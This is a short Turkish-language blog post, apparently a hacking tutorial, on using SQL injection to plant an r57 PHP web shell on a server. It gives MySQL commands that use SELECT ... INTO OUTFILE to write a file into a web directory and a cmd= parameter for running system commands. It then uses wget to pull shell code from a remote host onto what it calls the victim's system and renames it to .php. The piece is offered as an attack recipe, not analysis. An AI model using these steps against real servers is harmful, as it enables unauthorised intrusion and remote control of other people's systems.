SQL injection ile r57 shell uplaod etmek
SQL İnjection ve Shell

 

mysql> show databases; -> Mevcut db’lere baktık.

mysql> create database yeni_db_adı; -> yeni bir database oluşturduk.

mysql> use yeni_db_adı -> Oluşturduğumuz db’de işlem yapacağımızdan kullanıma onu alıyoruz.

mysql> SELECT “Kodlar buraya !” into outfile “dosyanın_oluşturulacağı_dizin/dosya_adı” -> belirlediğimiz dizine belirlediğimiz adda belirlediğimiz işlevde çalışan bir dosya oluşturduk.

Siz isterseniz kodların yazıldığı kısma upload scripti oluşturup sisteme  r57 shell’inizi yükleyebilirsiniz.

SQL İnjection R57 Shell

Şimdi tarayıcıdan oluşturduğumuz dizine geliyoruz, , ben komut çalıştıran bir script kodladım, verdiği hata, dosyada herhangi bir içerik olmadığının hatası, çünkü veri girişi yapmadık.

R57 Shell

dosyadı.php?cmd=BURAYA_KOMUT_GİREBİLİRSİNİZ | uname ile sistem hakkında detaylı bilgi edebilirsiniz.

Uzak hosttaki r57 shell kodlarım, bunları kurbanın sistemine çekeceğiz, şöyle ki

wget uzak_host_adresi.com/dizin/dosyadı.txt

Script PHP ile kodlandı, .txt’den .php ismine dönüştürüyoruz çalışması için.

ls ile dosyaları listeliyoruz evet dosyamız burada .

Karşılaştığınız herhangi bir soru veya sorunlar hakkın da yorum da detaylı bir şekilde belirttiğiniz taktir de ücretsiz olarak zaman buldukça yorumları cevaplayacağım.

Yorum Yap

E-posta hesabınız yayımlanmayacak. Doldurulması zorunlu alanlar işaretlendi *